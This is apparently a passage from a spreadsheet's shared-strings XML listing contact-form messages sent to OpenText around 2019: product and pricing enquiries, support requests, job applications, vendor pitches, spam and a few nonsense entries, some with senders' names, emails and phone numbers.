I'm getting quotes from various VANs on providing simple EDI VAN services (I would connect to you via one of ftps/sftp/oftp2 and send and receive raw EDI (mostly EDIFACT) messages to and from partners, and that's all)._x000D_
_x000D_
We currently use about 1080 kilobytes per month of combined send and receive traffic._x000D_
_x000D_
What price could you offer us for this service?_x000D_
_x000D_
We have branches in the US and in Europe, so might pay in USD or EUR._x000D_
_x000D_
Also include payment options (credit cards, ACH, regular invoice, etc.) and any require contract length terms._x000D_
_x000D_
Thanks,_x000D_
_x000D_
John LAWLER</t>
  </si>
  <si>
    <t xml:space="preserve">I just received notification from American Express about a charge from you in the amoiunt of $65.28. I have not made a purchase from your company, please contact me and reverse the charge immediately!_x000D_
 _x000D_
OPEN TEXT	 $65.28*  	Mon, Jan 21, 2019_x000D_
 _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear community of OpenText,_x000D_
_x000D_
My name is Bohdan Vovchenko and I’m a Business Development Manager at Langate Software._x000D_
Our CEO, Vlad Vakser would like to meet with your VP of Engineering or CEO at HIMSS 2019 to introduce our company and see if our expertise in linking EMRs/RCM/HIEs (FHIR, HL7, and X12), building data warehouses with embedded BI and AI, developing RCM platforms, patient portals and mobile applications can help your organization._x000D_
_x000D_
Please let me know, what time/day would be suitable for you to meet us there?_x000D_
_x000D_
I am looking forward to hearing from you!      _x000D_
     _x000D_
With great respect, _x000D_
Bohdan_x000D_
</t>
  </si>
  <si>
    <t>Dear Sir,_x000D_
_x000D_
A very good morning to you. I am Airudin from Citrix’s System procurement team. I am reaching out to you as I would like to find out more on the services that you provide. _x000D_
_x000D_
We understand that your firm produces analytics products that may fit our business requirements and I have an internal stakeholders in US region which I am supporting who is looking for Customer Feedback Management (CFM) / Text Analytics / Natural Language Processing software application. Are you the correct person whom I ask for further details on this._x000D_
_x000D_
Just to give more insights on the requirements._x000D_
Ideally, my stakeholders are looking for a solution that includes the below features, and are looking forward to understanding what your company is able to offer._x000D_
_x000D_
•              Ability to build contextual classification text models within platform_x000D_
•              Natural Language Processing_x000D_
•              Out of the box Industry classification templates_x000D_
•              Topics and clauses parsed individually from sentences, verbatims, and articles_x000D_
•              Sentiment Score (linear and variable. Not limited to 3) associated with each theme, topic, word, or phrase, not limited at the record level. Proximity and contextual. Ability to tune for business need_x000D_
•              Level of Effort classification templates_x000D_
•              Emotion classification templates_x000D_
•              World awareness classification templates_x000D_
•              Theme detection _x000D_
•              Ad hoc uploads_x000D_
•              Robust reporting capabilities_x000D_
•              Multiple source dashboard reporting (text classification, structured data, external data) _x000D_
•              Integration capabilities (continual / API feed) _x000D_
•              Website robot configuration and integration _x000D_
•              Multilingual _x000D_
_x000D_
If you are able to provide these services, I would like to find out on your interest to participate in our upcoming Request for Quotation for these services. Should you have any further quer</t>
  </si>
  <si>
    <t>Check pricing for integration with dsw in usa</t>
  </si>
  <si>
    <t>I am trying to pay a bill for the first time and the system keeps saying I need to click on the confirmation email which I've already done a few times now.</t>
  </si>
  <si>
    <t>When I try to create a ticket I get the message that I  do not access to the function._x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>DM Plugin for Outlook will not Enable</t>
  </si>
  <si>
    <t>I am looking for a transducer replacement for a matrix 27 fish finder, HELP</t>
  </si>
  <si>
    <t>I have been tasked with creating an SCCM push for BCC v16.3 Validation.  I cannot seem to get it to install silently.  I have been using the /q msi switch along with INSTALLMODE=4 property and the install looks to get about halfway through before backing off.  The software installs without issue if I install manually from the command line using only the INSTALLMODE=4 property and clicking Next, Next, etc.  Would you please provide the correct command line options to install BCC Validation silently?  Thank you.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I contacted a few weeks ago about a client that is acquiring some data using Documentum and what we need to do to become a reseller. I was not able to find the original email response from your team, I was hoping someone could send me an email with contact information. We should have more details on the project today and would like to get started working with you as soon as possible._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Katie Botti</t>
  </si>
  <si>
    <t>Idk</t>
  </si>
  <si>
    <t>Im tired of being scammed. Having my identity stolen. And tired of being gang stalked. Lose my address please</t>
  </si>
  <si>
    <t>Hi,_x000D_
Does Birt supports Arabic UI (language and right to left)?_x000D_
Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm qualify to </t>
  </si>
  <si>
    <t>contact me ASAP. Abb Inc is trying to make invoice payments for the a/c XPEDITE SYSTEMS LLC/EASYLINK SERVICES INTERNATIONAL CORP. Payments has been returned due to bank changes</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
wir führen gerade SAP (OnPremise, S4/Hana, GoLive 01/2020) ein. Hierfür sind wir auf der Suche nach einem Archivsystem._x000D_
In aller Kürze die Kernanforderungen:_x000D_
- Speicherung der an Businessobjekte angehängten Dateien_x000D_
- Archivierungsziel für S4/HANA_x000D_
- Hardwarebasis zur Datenablage: Silent Cube (FastLTA)_x000D_
_x000D_
Falls Sie Interesse an einer Zusammenarbeit haben, nehmen Sie bitte Kontakt zu  mir auf. Vielen Dank_x000D_
Mit freundlichen Grüßen_x000D_
Holger Krinke_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">He is look for a job has experyant from work at labou department </t>
  </si>
  <si>
    <t>Hello,_x000D_
I'm interested in the "DF120 - Foundations in Digital Forensics with EnCase" course, due to other commitments I'm unable to attend site for the training. Please could you confirm the difference between "Virtual Classroom - Europe GSI UK Time"  and "OnDemand" training? Can both be completed at home? _x000D_
_x000D_
Thank you,_x000D_
Hannah</t>
  </si>
  <si>
    <t>I want to have access to to OpenText knowledge center where all the installation guides and support packs are available for download. We have purchased SAP archiv for opentext and now i want to install it.</t>
  </si>
  <si>
    <t>Request for Training in Mobile Forensics Encase 125, And Encase 310 PREP course in February 2019 at the UK (Reading). I would like to inquire if you could schedule a training for Mobile Forensic in Feb 2019. I intend to register for the encase 310 either on Feb 5th or Feb 19th as per your training calendar. However, would like to immediately undertake the Encase 125 (Mobile Forensic Course); I realize that it's scheduled for May 2019._x000D_
_x000D_
Please kindly confirm if you could bring forward the Mobile forensics course, so its either before or immediately after the encase 310 course._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>why your invoice 08008411812?</t>
  </si>
  <si>
    <t>Ladies and gentlemen, _x000D_
_x000D_
we are using 2 licenses of Exceed 15 to communicate from Windows 7 SP1 (64 bit) computers to Linux (RHEL) or Unix machines. Please send me an offer for an update to a version of your software which is compatible with Windows 10 64-bit (2 licenses). Our last offer had these data according to my files:_x000D_
Angebotsnummer: 00167286_x000D_
Datum (TT/MM/JJJJ): 08/06/2015_x000D_
_x000D_
We would need prices in CHF, ideally from a reseller in Switzerland._x000D_
_x000D_
With many thanks and kind regards,_x000D_
_x000D_
Thomas Laube</t>
  </si>
  <si>
    <t xml:space="preserve">We are planning Tech-Refresh for our server from Windows server 2008/R2 to Windows server 2016. _x000D_
For that we need compatibility information of following applications with Windows server 2016. In case the current application version is not compatible kindly suggest a compatible one._x000D_
_x000D_
Applications are as below:_x000D_
StreamServe Framework and Control Center SP5_x000D_
</t>
  </si>
  <si>
    <t>Good Morning_x000D_
I request to send price list of the tools below:_x000D_
  - Open Text Analitycs Reports_x000D_
  - iHub_x000D_
What are the paying ways?_x000D_
Thank you</t>
  </si>
  <si>
    <t>Good morning, sir,_x000D_
I contact you after being instructed by my administration to verify and purchase cost of the Tableau Forensic Duplicator TD2u that I know duration and after-sales warranties, type on-site service, malfunctioning apparatus replacement and so on. To complete the kit and for completeness I ask you to detail the material sold with each individual TD2u (cables, accessories, etc.)_x000D_
Looking forward to receiving your feedback nod I greet you cordially._x000D_
Please send me communications to the email address indicated in the form (agus.gianluca@gdf.it).</t>
  </si>
  <si>
    <t>Hi ,_x000D_
I have a query can we use Actuate Birt  for Excel report ? If we can  is it open source?_x000D_
How to install and Use it ? _x000D_
can you Please help me Out in the Above queries _x000D_
You reply will help me a lot _x000D_
Thanks in Advance ,_x000D_
v.venkatesh</t>
  </si>
  <si>
    <t>I need a good JOB</t>
  </si>
  <si>
    <t>major issues in trading grid site</t>
  </si>
  <si>
    <t>Interested in learning how your solutions can help hedge fund managers achieve straight-through-processing.</t>
  </si>
  <si>
    <t>Need to check the approx cost of Open text imaging software for commercial usage.</t>
  </si>
  <si>
    <t>Get support of Actuate Report System</t>
  </si>
  <si>
    <t>Hi, Do you provide QMS solutions? if so could I please obtain sales collateral, details around the offering? Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">To concribute to the company ND support my family, my two children. And make a better future for them </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are receiving the following error message whenever someone tries to run a search via Recommind on our Intranet:_x000D_
_x000D_
An unexpected error has occurred!_x000D_
We could NOT login because we received an Exception during the login operation._x000D_
_x000D_
Details: Time 2019-01-19T16:16:27.699-05:00; Error Code: LOGIN_FAILED; Error Level: ERROR_x000D_
_x000D_
Can you please assist with this?_x000D_
_x000D_
Thank you,</t>
  </si>
  <si>
    <t>I used to have a YouSendIt account, and I am trying to access the files I saved there. I can't recall my password, and when I tried to get HighTail to send a new password, I never got the email. Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Is the Sales Account Specialist position still available? </t>
  </si>
  <si>
    <t>I would like to inquire for a local provider in the Philippines who can support us for implementio of documentum and captiva</t>
  </si>
  <si>
    <t>Dear OpenText,_x000D_
_x000D_
I am a high school student from Rockville, MD working to organize a hackathon by the name of CodeDay DC, which is happening on March 2nd /3rd at George Mason University. We are currently looking for sponsors for the event starting as low as $250. I believe that you would benefit from supporting us as you'd be able to promote the company as well as reach an active group of upcoming student developers! Additionally, we’ll also have the opportunity to talk to GMU’s attendees of their Youth Engineering Conference, and we’d be happy to introduce sponsors like you to their attendees as well._x000D_
_x000D_
Please let me know if you need any more information regarding this. I look forward to working with you!_x000D_
 _x000D_
---_x000D_
_x000D_
Vincent La_x000D_
Organizer_x000D_
t: 301-281-7111_x000D_
e: vincentla@srnd.org</t>
  </si>
  <si>
    <t>I'm participate in project to renew our corporate website, my customer(web managers, not an IT dept) wants to modify contents, upload photos, etc. So I want to know more about features of the Opentext content management software, also about the pricing policy.</t>
  </si>
  <si>
    <t>Suck It, Michael Singer Senior Content Editor.</t>
  </si>
  <si>
    <t>Hi,_x000D_
I’m currently working on a project which is looking an application to produce structured documents (billing) in a large scale (50k+) every nights.    The application must have the following capabilities :_x000D_
pre-processing, document authoring tool, Document rendering, template management, post processing capabilities._x000D_
_x000D_
At the moment we have a vendor who manage the bill rendering and delivery of the document, and we would like to de-couple the document rendering capability, so the business have a quick access to to make changes in the document._x000D_
_x000D_
I've looked at the website, it looks like StreamServe application might be able to deliver the requirements._x000D_
_x000D_
Could someone contacted me, to discuss this further._x000D_
Thanks,_x000D_
Roy</t>
  </si>
  <si>
    <t>Hello! _x000D_
_x000D_
I am a third year student at the University of Waterloo, studying Computational Mathematics. After doing research into tech companies hiring for summer jobs, I have discovered that your company is looking, so I would like to apply to work at your Waterloo office. In particular, I would be interested in any development or analysis positions that you see fit.  _x000D_
_x000D_
I am not able to post my resume or school transcript in this chat box, so feel free to contact me to obtain copies of those or if you have any questions. Thank you for your time._x000D_
_x000D_
Sincerely, _x000D_
Brendan Shuttleworth</t>
  </si>
  <si>
    <t>Hey All,_x000D_
_x000D_
I want to get more information on if there is a demo or trial version of OpenText Content Server that I can spin up to study with as I am tasked at work with similar duty's._x000D_
_x000D_
Regards,</t>
  </si>
  <si>
    <t>Want to know about rightfax</t>
  </si>
  <si>
    <t>I am completing an application for a privacy role and wish to call your attention to the registration page requesting for consent (3 separate consents request). There are no "No" options available on this page for individual who do not want to give consent to the use of their data for items 2 and 3 specifically.</t>
  </si>
  <si>
    <t>Am looking for experience and being a proffesional driver</t>
  </si>
  <si>
    <t>Cualquiera</t>
  </si>
  <si>
    <t xml:space="preserve">Oil &amp; Gas Middle East is the Leading Magazine targeting the Oil &amp; Gas Sector. _x000D_
_x000D_
Please see attached a sample of the Special Report we do monthly in the magazine. _x000D_
_x000D_
In the March issue the topic is :-  Digital Asset Management _x000D_
_x000D_
As oil and gas companies move towards digitally – connected upstream operations, they need to learn to leverage the full power of that network, and the data it contains, across assets. New Software makes it easier than ever to understand the full reach and impact of digital assets and to manage them efficiently, so the right data is with the right person at the right time._x000D_
_x000D_
We have different ways your company can participate in this Special Report. Let me know if this is of interest to you we can take it further. _x000D_
_x000D_
Awaiting your kind reply at the Earliest. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Looking for a job and like comunicating with people</t>
  </si>
  <si>
    <t xml:space="preserve">For Job oppotunities ,or any general vacancy that suit my standard of life_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Sales of Business Process Automation and Enterprise Content Management Solutions </t>
  </si>
  <si>
    <t>Hey Team,_x000D_
_x000D_
I wanted to find out if you have any localization needs at O​penText ​(Text translation, Desktop publishing, African content writing, Movies subtitling, Video/Audio Transcription, Copy writing ...)?_x000D_
_x000D_
We can increase sales, engagement, conversions and more through our translation and localization services._x000D_
_x000D_
Also, we're very interested to become a preferred supplier for you in handling your translation and localization needs for your educational processes including; books, workshops, seminars, E-learning, brochures and other documentations._x000D_
_x000D_
Interested? Email me Back, I’d love to chat._x000D_
_x000D_
Best Regards,_x000D_
Amr Adel | Director Of Marketing</t>
  </si>
  <si>
    <t>aaaa內容aaaaa</t>
  </si>
  <si>
    <t xml:space="preserve">Hello my name is Hamza I have an idea about New social Media to make you a new leader in this area I would like to introduce this idea to you </t>
  </si>
  <si>
    <t>For help please help me</t>
  </si>
  <si>
    <t>Production problem, AppXender is down with the error message "Unable to acquire the license. Try again", need support soon. Thank you. Josephin</t>
  </si>
  <si>
    <t>Здравствуйте, меня зовут Николай и я Seo-специалист с опытом работы более 6 лет. _x000D_
Много работал в web студиях, за все время через мои руки прошло более 230 проектов. _x000D_
 _x000D_
Хочу вам предложить seo аудит вашего сайта или конкретной страницы сайта. _x000D_
*Примеры аудитов присылаю по запросу на почту. _x000D_
 _x000D_
SEO аудит страницы выявит ошибки, негативно влияющие на её ранжирование в поисковых системах. Насколько конкретная страница оптимизирована под интересующий вас запрос. Вы получите информацию по всем важным ошибкам, как крупным, так и мелким. _x000D_
 _x000D_
Seo аудит позволит выявить насколько хорошо работает ваш сео специалист и веб-студия и позволит им же исправить ситуацию в лучшую сторону. Любой толковый сеошник легко поймет, что нужно подправить, чтобы улучшить показатели. _x000D_
 _x000D_
Вся информация предоставляется в удобном PDF файле, с удобной и понятной структурой и понятными описаниями. _x000D_
 _x000D_
Стоимость seo аудита 1 страницы 199 рублей по 3 ключевым запросам. _x000D_
При больших объемах есть скидки. _x000D_
 _x000D_
По всем вопросам пишите на почту: seo.analytic.pro@gmail.com</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Do you want more clients and customers?_x000D_
_x000D_
We will help you by placing your website on the 1st page on Google._x000D_
_x000D_
I will be happy to send the "Free Proposal" and "Pricing"._x000D_
_x000D_
Want to know more about my company, costing on SEO, results etc._x000D_
_x000D_
Please email us for full proposal._x000D_
_x000D_
Thank You!_x000D_
Lisa | Whatsapp: +91 9212464161_x000D_
</t>
  </si>
  <si>
    <t>sadihagsfdbhsdf</t>
  </si>
  <si>
    <t>I'm ambitious, self driven, able to  work under pressure with a team  and alone. I always ensure that I complete  my work before deadlines.</t>
  </si>
  <si>
    <t>looking for an enterprise solution for efax</t>
  </si>
  <si>
    <t>Unsubscribe me</t>
  </si>
  <si>
    <t xml:space="preserve">a client in Europe wants to send me messages via Tempo Box, without any additional info. He suggest I can just log into their company's system. I'm sure that's too simplified/easy, but I'm not sure what's needed. Do I need their IT administrator to let me register and log onto their system? </t>
  </si>
  <si>
    <t>I purchased Team Developer 6.0 and I need to rebuild my developer machine and I can't find the original install.  Is there a Team Developer 6.0 SP8 install that I can download?</t>
  </si>
  <si>
    <t>Not have a bank account so will you please stop I need money in order to open a bank account please stop cuz I don't want to play this little sick dumb game with you all about getting a loan eliminate some bills that I have can I have just one bill outside of my phone bill my rent in my electric so please stop and tell everyone else to stop</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
Does Open Text have any of the old\archived  On Demand training videos for EnCase Enterprise v7 ?  We still use Enterprise v7 here at the MGO and would like to view (if you have them) archived On Demand videos of Enterprise v7 training.  </t>
  </si>
  <si>
    <t xml:space="preserve">May I please be directed to somebody who can discuss the possible sale of your previous domain hummingbird dot com? I am a humble, independent bartender working on a project and I am interested in the name Hummingbird. Thank you for your time. </t>
  </si>
  <si>
    <t>Former Myriad Viewer customer looking for current version.</t>
  </si>
  <si>
    <t>What is the latest version of First Class Desktop Client that will run on Windows 7? I am on 12.122. How do I find the link for this?</t>
  </si>
  <si>
    <t>When I refer to our NFS Solo and NFS  Client Our notes show 'previously known as'....Maestro. did the word Maestro go away?  Please have someone email me answer. Thanks.</t>
  </si>
  <si>
    <t>EnCase trial/purchase</t>
  </si>
  <si>
    <t>I have had my account with Hightail for 15 years and now I  can not log into my account and access my files. I have emailed and emailed can someone please help me out I need to access my account ASAP</t>
  </si>
  <si>
    <t>I don't have that cell number I don't got that phone at all</t>
  </si>
  <si>
    <t>Please contact me reference EnCase Forensic SMS renewal on V387464004 and V1887716500</t>
  </si>
  <si>
    <t>Pointed Legalkey to new database server. to authenticate.  Changed the server in the registry. "Invalid Connection string attribute" after trying to authenticate.  get this when i put a bad password in also.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello OT Team,_x000D_
We need for new project to determined the sizing of HW, so could you please send the HW questioner, _x000D_
_x000D_
Thanks _x000D_
Mohammed Helmy_x000D_
 </t>
  </si>
  <si>
    <t>Enterprise World Vienna_x000D_
I am writing regardin the event for Partners on March 12nd in Vienna. Is recommended any accomodation for the Partners that are participating?_x000D_
Thank you._x000D_
Kind Regards, _x000D_
Michela</t>
  </si>
  <si>
    <t>my team members received log in passwords but I did not.  Please send. I work in Manhattan, not Brooklyn, for HSBC Bank USA, NA Client Documentation Group</t>
  </si>
  <si>
    <t>My company has an account however I did not receive a welcome email with my user id and password.</t>
  </si>
  <si>
    <t>I canceled this account in November and just received a bill for $12.95.  Account number is 777484.  Invoice number 1901777484.  Please remove this balance and insure my account is canceled.  My fax number was CANCELED.  Please confirm that my account is inactive and there is no balance.  My phone number is 303.718.1947 and email me at eric@door2denver.com</t>
  </si>
  <si>
    <t>Hi OpenText team,_x000D_
_x000D_
Please, let me know if the product Open Text HostExplorer 14 x64 works well over Windows 10. We only have a doubt with this application before to upgrade from Windows 7 to Windows 10._x000D_
_x000D_
Regards,_x000D_
David Tarazona</t>
  </si>
  <si>
    <t xml:space="preserve">I need would like to know the course start and end times for:_x000D_
1-0184 Managing Documents in Content Server v16.2 Virtual Classroom Feb 25 - Feb 27_x000D_
2-0120 OpenText Records Management 16.2 - Virtual Classroom Mar 4 - Mar 6_x000D_
I have a time conflict for four of the days above from 9:00 am ET to 10:30 am ET and wanted to know the times and possibly other options (e-learning?)._x000D_
</t>
  </si>
  <si>
    <t>Testing to see who will receive the ticket. We receive customer complain saying that they have not received response. Please contact me ASAP. Thanks!</t>
  </si>
  <si>
    <t>I would like to know the ECCN-Code for Imaging Windows Viewer and DesktopLink 16.0.</t>
  </si>
  <si>
    <t>Hello, _x000D_
I'm contacting you on behalf of the VISTA-AR project led by the University of Exeter. The project consortium comprises eight partners including: the Regional Council of Brittany; Fougeres Castle; Bournemouth University; Centre for Industrial Higher Education; NEOMA Business School; European School of Art (Brittany); Exeter Cathedral. An additional four sites: National Trust (Tin Coast); South West Coast Path; Gardens of Valloires; Underwater Museum (Lorient) provide additional test sites. The project is funded by the European Regional Development Fund (ERDF) under the auspices of the France (Channel) England Programme. The University of Exeter is leading the procurement of a Visitor Intelligence cloud solution which is currently live. The focus of VISTA AR is to develop an understanding of visitor experiences. Specifically the project aims to develop this understanding using Text Analytics (TA) and geospatial tracking_x000D_
to analyse visitor feedback/behaviour collected from cultural heritage locations by means of the Visitor Intelligence cloud solution. We are currently gauging potential contractors who can participate in the bidding for the Visitor Intelligence cloud solution. If you are interested, feel free to contact me by email/phone, or participate in the bidding process (Tender RefNo. UOE/2018/055/LJ)._x000D_
_x000D_
Many thanks,_x000D_
Julie Bécel</t>
  </si>
  <si>
    <t>Hello,_x000D_
we would like to upgrade our workflow from EnCase version 7* to 8*. Serial numbers of our dongles are:_x000D_
G2002078601_x000D_
V1895514718_x000D_
V1622953000_x000D_
Is it possible for you to send us new certificates to enable forensic mode in EnCase v8.07+? If there is a different approach/process to upgrade to v8.07+ that we should undergo please let me know._x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Oliver Waczulik</t>
  </si>
  <si>
    <t>Looking at document viewer, collaboration and redaction software to fulfill information requests under GDPR.  The Blazon and Brava products look interesting and I would like to understand their capabilities and differences between them.</t>
  </si>
  <si>
    <t>Hello. Can't find a link to installation files of Encase Forensic v7 and v8 on the Guidance site. Emails with the links are lost. Help me please to get files.</t>
  </si>
  <si>
    <t xml:space="preserve">Wanted go get general information regarding our current License and Rightfax Connect. Is it possible to setup demonstration/WebEx? </t>
  </si>
  <si>
    <t>I am trying to get information as how to purchase additional fax numbers. Please contact me back to discuss</t>
  </si>
  <si>
    <t xml:space="preserve">Im looking to purchase a Single License of  OpenText HostExplorer for zSERIES conncectivity . Can you give me a price . </t>
  </si>
  <si>
    <t>Hello!_x000D_
I hope you're doing well. _x000D_
I'm contacting since I would need information about the OpenText RightFax software. We will be managing high volumes of fax coming and going out and we would like to know if RightFax could help us. Is there any chance to try the software and do you offer a tutorial or manual in order to learn how the software works? It would be great if you could help us with. _x000D_
Thank you very much for your time_x000D_
Jairo</t>
  </si>
  <si>
    <t>Hello, _x000D_
Can please advise how I can successfully access the KC.  When I attempt to access the KC  (.../knowledge/...) I'm informed that I've not registered (although I've attempted to numerous times). I select the mail request and complete the process and a message appears: "Account verified successfully for access to opentext . com".  I now seem to have an OT account but when I browse to the KC link I'm again sent down through this registration process.  Am I missing a step in the process to gain access to the KC? _x000D_
_x000D_
Regards, _x000D_
David O' Connell.</t>
  </si>
  <si>
    <t>we as envaromental jastice young pioneers co-operative we wold like u to assist as with grant application .</t>
  </si>
  <si>
    <t xml:space="preserve">Hello!_x000D_
_x000D_
My name is Anthony and I represent StaffCop - a Russian developing company which produces an software solution for information security and employee monitoring._x000D_
_x000D_
At the present moment we are in search of new partners in UAE who would agree to act as resellers._x000D_
</t>
  </si>
  <si>
    <t>Shsjsjsjshshshsjsjsjshgsvvabsbzbdiieue</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I'm looking for a sales contact for a Document Handling project in our Volvo plant in Gent._x000D_
Who should I send the specifications at Opentext, please?_x000D_
</t>
  </si>
  <si>
    <t>pool dead</t>
  </si>
  <si>
    <t>Dear support Unfortunately we can't confirm e-mail softlicences@airbridgecargo.com. Also we have question about starting client on Windows7.</t>
  </si>
  <si>
    <t xml:space="preserve">Hah </t>
  </si>
  <si>
    <t xml:space="preserve">Exploring possibilities for business in Oil and Gas Industry. Upstream and Midstream._x000D_
What products are catered to these areas and how could we be associated. </t>
  </si>
  <si>
    <t>in Need of a job at ur field</t>
  </si>
  <si>
    <t xml:space="preserve">in need of a Jon </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I wish to understand if there is any certification/bootcamps specific to OTIC (Opentext Integration Center)? If yes, please share the details. If no, is there any other certifications/bootcamps related to migration tools/utilities?_x000D_
_x000D_
Thanks and Regards,_x000D_
Goutham Kumar</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, We are creative company and our Designs are biggest Assets for us. We would like to protect and organise them in much productive way, increase the team collaboration. </t>
  </si>
  <si>
    <t xml:space="preserve">Need urgent support with user access to http://actuatebirt/Scorecard/login.aspx </t>
  </si>
  <si>
    <t>Dear Sir or madam,_x000D_
_x000D_
I kindly ask you to delete / remove my user account michel.kaestner@web.de at your opentext-website._x000D_
_x000D_
Thank you in advance!_x000D_
Regards,_x000D_
Michael Kästner</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir / Madam,         _x000D_
_x000D_
Good Day!_x000D_
_x000D_
We are representing HireRight and we are performing a Background Screening. We have been appointed to verify information for the purposes of a pre-employment screening report and have been asked to confirm the employment history of your previous employee._x000D_
_x000D_
We would like to inquire if you can help us verify employment. If not, kindly provide us a phone number or email address of Human Resources Department/Payroll  or anyone authorized  that we can send the request form for reference. _x000D_
_x000D_
We would appreciate if you could send us the information as soon as possible._x000D_
_x000D_
Have a great day!_x000D_
</t>
  </si>
  <si>
    <t>Hahah</t>
  </si>
  <si>
    <t>I am evaluating OpenText products for our ECM. I need details about your Cloud offerings.</t>
  </si>
  <si>
    <t>Hi, I'm writing to inquire if OpenText offers legal document management system services. Thank you.</t>
  </si>
  <si>
    <t>Dear Opentext,_x000D_
_x000D_
We were recently informed from our telecom carrier that a fax was not going through to a provider we wanted to fax because of the following issue: _x000D_
_x000D_
"We see your attempts to fax 636-390-1596. On each attempt we see a SIP 488  response coming back from your equipment. The calls are offered in T.38 codec but are renegotiate with G.711 after receiving the rejection. Please ensure your equipment is set up to support T.38."_x000D_
_x000D_
I'm wondering if we need a license to support T.38, if it is supported by Rightfax, or if it is a limitation of our carrier possibly, etc.   I'm wondering otherwise is there a programming change we can enact to add support onto our servers and outbound lines (over a VoIP SIP circuit with CallOne in Chicago).  _x000D_
_x000D_
Please advise, _x000D_
Richard Valenta_x000D_
Telecom System Admin_x000D_
920-663-9025 (office)_x000D_
rvalenta@forefrontderm.com</t>
  </si>
  <si>
    <t>Would like to purchase a license for Brava Desktop - my trial license expired.</t>
  </si>
  <si>
    <t>We are interested to look @ OpenText - VIM solution integrated with our SAP ECC system.</t>
  </si>
  <si>
    <t>Technical capabilities of OpenText-brava on redaction and how it can be integrated with our workflow.</t>
  </si>
  <si>
    <t>Partnership Discussion_x000D_
I own a company called Front Row solutions. Front Row is focused on fast and easy data collection from the field. We have created a number of apps that when activated allows mobile workers immediately after  customer interaction to quickly (60 seconds or less) and easily (learn in 5 minutes) submit a report, form or survey from the field. With Open Text's providing the key information during a sales call or customer interaction and Front Row s ability to report on that customer interaction  I though their might be a synergy between our companies. I look forward to a discussion. thanks Etien</t>
  </si>
  <si>
    <t>This is Chalan Rump, senior producer for The Advancements TV series which airs via CNBC. I am in the process of gathering content for an upcoming episode focusing on innovations in cloud technologies. Opentext has some very unique technologies, which might be a good fit for this particular episode. We would like to get more information about what makes your company unique in the industry. The goal of our program is strictly to educate the public about new developments in the industry and what companies are doing to differentiate themselves. Opentext could potentially be a great fit for one of our upcoming episodes. I have a few questions for you regarding the technology and its various applications. I welcome the opportunity to speak with you further on this subject and will be available in the studio next week 9-5 EST. Looking forward to speaking with you.</t>
  </si>
  <si>
    <t>For Talent Acquisition Team:_x000D_
_x000D_
I am interested in working for your company office in Wateloo ON Canada for a summer 2019 internship in the finance and accounting deparment.  I checked the opportunities and did not see any internships listed so i am reaching out via your contact page._x000D_
_x000D_
I am in the process of completing my year 1 at UW in Accounting and Finance and doing well._x000D_
_x000D_
Thank you for your time.</t>
  </si>
  <si>
    <t xml:space="preserve">I am the Chief Business Officer of Suspect Technologies which has a novel solution for automatically analyzing faces in videos and pictures.  We currently specialize in software used for redaction of body worn cameras and are now looking to work with digital forensic companies on our new picture and video analysis engine.  This will allow your clients to quickly make sense of the images and videos found on a suspect's mobile device._x000D_
_x000D_
Please let me know if you are interested and have time over the next couple of weeks to discuss in more detail._x000D_
</t>
  </si>
  <si>
    <t>I would like to purchase a copy of Brava desktop for marking up and measuring drawings.  I tried to download the trial but it didnt work on my macbook.  Do you have a version that works on mac at all?_x000D_
_x000D_
Kind regards_x000D_
_x000D_
Andy</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,  I an trying to confirm if Open Text Imagination 8.3 is windows 10 compliant.  Thank you  </t>
  </si>
  <si>
    <t>Unable to login due to "Server Error" on the support site.  Trying to download patches for software and the site let me download 1 Documentum Server patch notes file but the Patch 21 for Documentum Server 7.3 for Windows SQL 64bit throws a "Server Error" and now I cannot even log back into the support site.  It too now throws "Server Error" and looks like it's something going on with your SSO.  So...support site is basically down.  _x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">We would like more information on OpenText Capture Center. Currently we use Captiva 7.6 and are interested in upgrading to the Capture Center software. </t>
  </si>
  <si>
    <t>I need to register my EnCase dongle #V1573269316, so I can get the current updates.  I have created an account, but still do not have access for this product.  _x000D_
Thanks,_x000D_
Rick</t>
  </si>
  <si>
    <t>I'm leading a discovery project to replace our current DAM and would like to schedule a demo of your Digital Media Manager for our team before the end-of-the-month. _x000D_
I look forward to hearing from you.</t>
  </si>
  <si>
    <t>If you are part of Hightail, Inc. then why am I not getting access to my Hightail account for sending files from my computer.</t>
  </si>
  <si>
    <t xml:space="preserve">Guten Tag! Ich bin Mitarbeiter der Firma Rheinenergie AG und mache jetzt Software-Konsolidierung. In unsere Software Liste steht auch Ihre Software Open Text Desktop Viewer. Leider kann ich kein mehr Information geben, wie z. B. welche Version haben wir usw.. Alles was ich habe ist die Name und „Beschreibung“: Bildbearbeitung zum Erstellen von Rasterkarten aus Bebauungsplänen für Übernahme nach Smallworld._x000D_
_x000D_
Ich habe an Ihrer Web-Seite nicht alle Information gefunden, deswegen schreibe ich eine E-Mail. Vielleicht könnten Sie meine Frage beantworten. Hier sind die: _x000D_
_x000D_
1. Wird die Anwendung regelmäßig mit Updates o.ä. versorgt?_x000D_
2. Handelt es sich um eine 32- oder 64-bit-Anwendung?_x000D_
3. Gibt es eine Windows 10 kompatible Version der Software_x000D_
4. Ist die Anwendung Multiuserfähig?_x000D_
5. Lizenzsituation klären. Wie ist Lizenzmodell?_x000D_
6. Welche Schnittstellen existieren (z.B. Office-Integration)?_x000D_
